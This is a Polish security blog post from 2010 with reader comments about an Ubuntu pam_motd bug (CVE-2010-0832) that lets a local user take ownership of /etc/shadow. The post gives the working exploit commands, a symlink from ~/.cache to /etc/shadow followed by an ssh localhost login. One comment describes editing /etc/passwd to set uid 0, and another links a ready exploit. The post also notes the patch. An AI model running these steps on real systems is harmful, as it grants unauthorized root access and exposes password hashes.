14:03
8/7/2010

Ubuntu — root w 3 poleceniach :)

W systemie Linux Ubuntu znaleziono ciekawego buga, który pozwala podnieść lokalnemu użytkownikowi swoje systemowe uprawnienia.

Wystarczy podlinkować np. /etc/shadow do katalogu .cache:

ls -al /etc/shadow
rm -rf ~/.cache
ln -s /etc/shadow ~/.cache

Teraz trzeba się przelogować, np. tak:

ssh localhost
ls -al /etc/shadow

Podczas logowania do systemu pam_motd odwołuje się do .cache dość frywolnie podchodząc do kwestii uprawień …i zgadnijcie kto zostanie właścicielem pliku /etc/shadow? :-)

Screena trzasnął koto

Na ten, dość “oldschoolowy” błąd jest już dostępny patch. Można też ręcznie wykomentować pam_motd w configu.

Dajcie proszę znać w komentarzach, komu i na jakiej wersji Ubuntu zadziałało — błąd nie ogranicza się ponoć tylko do Ubuntu Karmica. (Ciekawe scenariusze ataku też można wklepywać w komentarzach :>).

Podesłał n1x0n.

Przeczytaj także:



57 komentarzy

Dodaj komentarz
  1. haha, na szczescie ja mam windowsa na serwerze :)

  2. Na Ubuntu 10.04 LTS też się da :-/

  3. U mnie Marcinie nie da sie, sprawdzalem na x64 jak i na x32 ofc mowa o 10.04
    2.6.35-6-generic

  4. 2.6.32-23-generic #37-Ubuntu SMP Fri Jun 11 08:03:28 UTC 2010 x86_64 GNU/Linux
    Ubuntu 10.04 LTS – nie dziala

  5. 9.04 x64 nie działa ;)
    agilob@agilob:~$ tail /etc/shadow
    tail: cannot open `/etc/shadow’ for reading: Permission denied

  6. O K*** mam to na 3 serwerach! Dzięki za info, lece łatać :]

  7. na stabilnym Debianie się nie da :)

  8. PCLinuxOS 2010.1 MiniMe… ;) Blad nie wystepuje :)

    Ja sie ciesze ze nie mam Windowsa na serwerze :D!

    Andrzej

  9. Na ubuntu 10.04 server edition też działa. Chciałem zrobić podobny trick z sudoers, ale sudo wymaga przy używaniu aby właścicielem sudoers był uid 0. zmieniłem więc uid usera w passwd na 0 (wcześniej uzyskując dostęp do passwd tym samym błędem)… Teraz logując się loginem i hasłem usera jestem rootem o_O.

  10. Od zawsze mam uczulenie na Ubuntu…Widać, że słusznie!

  11. http://dl.dropbox.com/u/7798898/Temporary/Snapshots/Shadow_hack.png

    Screen jako dowod :).

    Pozdrawiam Kolektyw

    Andrzej

  12. http://img51.imageshack.us/img51/6079/zrzutekranu11du.png

    Jest się czym cieszyć ? ;-)

    • Tak… osoby, ktore odpalają ssh localhost, wiedząc, że nie mają u siebie deamona… Za karę, Ziemeck znajdź inny trigger pam_motd.

  13. Ubuntu 10.04 Serwer & Home nie działa ;> Permission denied :D

  14. Potwierdzi ktoś, czy to jest problem także na debianie? Opis (już dostępnego z repozytorium) uaktalnienia na to wskazuje:

    Version 1.1.0-2ubuntu1.1:

    * SECURITY UPDATE: root privilege escalation via symlink following.
    – debian/patches-applied/pam_motd-legal-notice: drop privs for work.
    – CVE-2010-0832

  15. Pclinux 2010.1 “duży” buga brak. Przy ssh localhost dostaję komunikat sh: connect to host localhost port 22: Connection refused, natomiast właścicielem pliku nadal pozostaje root

  16. edit: prawa do pliku nie zmieniły się, dalej jest -r–r—–

  17. @chlondike

    Sprawdziłem na 2 maszynach z debianiem i nie udało mi się uzyskać tego co uzyskujecie na Ubuntu ;)

  18. Dzisiaj z rana była aktualizacja do pam_motd. Więc nie pieprzyć, tylko robić aktualizacje :)
    @jurek
    No tak. Tam musiałbyś na poprawkę czekać, zgodnie z cyklem wydawniczym poprawek M$.

  19. @ Sig PCLinuxOS rzadzi :).

    Pozdro ;)

    Andrzej

  20. na Łubudubu 10.4 zupgrejdziłem libpam-modules i “chakowanie” już nie działa :-) .

  21. @Piotr Konieczny
    login powinien też się sprawdzić kiedy nie ma ssh serwera zainstalowanego, mam rację?

  22. Sprawdziłem na drugim laptopie, lucid był podatny. A teraz apt-get upgrade i po problemie :)

  23. Włączyłem stosownego demona, i po tym Warning: Permanently added ‘localhost’ (RSA) to the list of known hosts komunikacje prosi o hasło. Na konto tego usera takowego napewno niema (stworzyłem je do celów testowych), więc naprawdę niewiem o jakie hasło mu chodzi ( nie przyjmuje hasła roota, a że to prywatna, domowa maszyna to chyba jedyne konto na którym takowe jest).

  24. @clondike
    Samo słowo “debian” jeszcze o tym nie świadczy, a wynika z tego, że Ubuntu bazuje na Debianie. W źródłach 1.1.1-3 (unstable) nie ma takich kwiatków.

  25. Tu macie szczegóły:

    http://www.ubuntu.com/usn/usn-959-1

  26. Sprawdziłem na fedorze: nie zmienia uprawnień /etc/shadow

  27. Linux Mint 9 też siadł. Ale w końcu to tylko lekko podrasowane Ubuntu.

  28. 1. ‘Ubuntu server’ mimo swojej nazwy nie nadaje się na serwery
    2. Nie używa się pam’owych dystrybucji
    3. Nie instaluje się niepotrzebnego softu (po co komu “Message of the day”?)

  29. Swoją drogą zastanawiam się nad jednym, mając dostęp do stacji i tak można zrobić wiele. Co do serwera, tego u siebie nie sprawdziłem, u mnie mój user ma jednocześnie prawa do sudo i hasła są identyczne, zastanawiam się czy to działa też dla usera któremu maksymalnie ograniczy się prawa.

    Na rootnode chyba jakaś maszyna stałą na Ubuntu :)

  30. @Szopnek:
    > 2. Nie używa się pam’owych dystrybucji

    czyli czego? Slackware?

    > 3. Nie instaluje się niepotrzebnego softu (po co komu “Message of the day”?)

    do przekazywania użytkownikom ,,message of the day”?

  31. Ubuntu 10.04 LTS – Lucid Lynx, działa :(

  32. Debian Squeeze bezpieczny!

  33. @A:

    No to sobie Waść łatkę zainstaluj, już dostępna.

  34. Kolejna wtopa ubuntu.

  35. Ubuntu 8.04 aktualizowany ostatnio tydzień temu. Nie działa, bo nie mam domyślnie zainstalowanego motd. Nie mam ochoty instalować, żeby sprawdzić. :P

    ktoś sprawdzał na 9.10? bo tez mam ale serwer tymczasowo wyłączyłem na przeprowadzki ;)

  36. Ciekawe ile M$ wydawałby update do podobnego błędu ? :)

  37. Ciekawa nowinka ;)

    U mnie nie działa, sprawdzane na Fedorze 13 i Debianie Squeeze.

  38. @abad0n, wodny, pinol

    Dzięki! Nie mam debiana (poza serwerem, specyficznie skonfigurowanym) do sprawdzenia. Zmylił mnie ten opis uaktualnienia, a bardziej szczegółowych informacji nie znalazłem kilak godzin temu. Dzięki za sprecyzowanie!

  39. Opensuse 11.2 bez robaka…nie zmienia uprawnień

  40. Ojj niestety u mojego admina apache nie zmieni tego :

    apache@hosting:>rm -rf ~/.cache
    rm: cannot remove `/root/.cache’: Permission denied

  41. CaLe szczescie ze Mdv jest dobrze zabezpieczona przed tego typu akcjami \o/

  42. Po hacku na Ubuntu należy ręcznie poprawić uprawnienia do /etc/shadow bo w przeciwnym wypadku nawet po aktualizacji plik pozostaje za uprawnieniam usera.

  43. http://ur1.ca/0lucs – sporo info od ludzi w komentarzach. Ogólnie bug już załatany, wystarczy puścić update’y. Dobry czas reakcji mają ;-).

  44. ubuntu intrepid – nie dziala,
    ubuntu lucid – nie dziala,
    ubuntu hardy – nie dziala…
    nie udalo mi sie tego uruchomic na zadnym z moich serwerkow.

  45. Na Łubudubu 10.04 zadziałało. W chacie na Archu na szczęście nie. Z drugiej strony, nie to żeby ktokolwiek poza mną miał dostęp do mojego komputera, czy to lokalnie czy zdalnie.

    Ubuntu wstyd.

  46. “serwer na Ubuntu? – to źle brzmi…” – powiedział kumpel na wieść o tym bugu ;)

  47. na Ubuntu 10.04 x32 działa niestety:(

  48. “serwer na Ubuntu? – to źle brzmi…”
    Tak samo dobrze jak dedykowany serwer na atomie ;D

    Ogólnie nie znam korporacji która korzystała by z Ubuntu Serwer – ale ja się nie znam.

    *Serwery made by Jasio Tumanesko na ogół pełnia funkcje zupełnie zbyteczne.

  49. @cwysocki:

    http://uptime.netcraft.com/up/graph?site=canonical.com

    Wygląda na to, że Canonical jednak używa Ubuntu. Może lepiej ISS powinni użyć? ;)

  50. Nie dziala mi na:
    – ubuntu-server 9.04
    – ubuntu-server 9.10 x64
    – ubuntu-server 8.10

    wiec luz.

  51. @r. No tak, Partik broni się przed PAM od długiego już czasu i chociaż mi już uczulenie na PAM przeszło (a niektórych modułów PAMowcom nawet zazdroszczę), to nadal cenię Slacka za to, że PAM tam nie ma :) Dawno temu PAM to był szwajcarski ser z dziurami i pewnie jeszcze ciutkę się dziura ozonowa powiększy, zanim załatają te wszystkie bugi ;)

  52. @jurek ogórek
    A ja na szczescie nie mam windowsa na serwerach :).
    Na ubuntu tez nie :)
    Ale jakbym mial windowsy to bym chyba nie mogl spac w nocy. Podobnej klasy blad z windows Help ma sie doczekac poprawki dopiero we wtorek. :(
    Pytanie retoryczne: O ile szybciej naprawili blad w Ubuntu? ;-)
    Pytanie retoryczne 2: W MS nic nie robia? Maja taki burdel w kodzie, ze nie wiedza jak poprawic? Czy po prostu taka jest polityka firmy (patch tuesday)?

    A swoja droga to ten modul PAMowy powinien na samym poczatku zrzucic uprawnienia i dzialac w kontekscie uzytkownika a nie root’a.

  53. lucid x64 działa.. Zdecydowanie wyciąłem nie czekając na update.

  54. I dla potomności – gotowy exploit na tę dziurę: http://securityreason.com/polish/naduzycie/8399

  55. ubu 10.04 bez aktualizacji odpalone na vbox

    -rw-r—– 1 root shadow 1221 2010-07-15 12:59 /etc/shadow

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: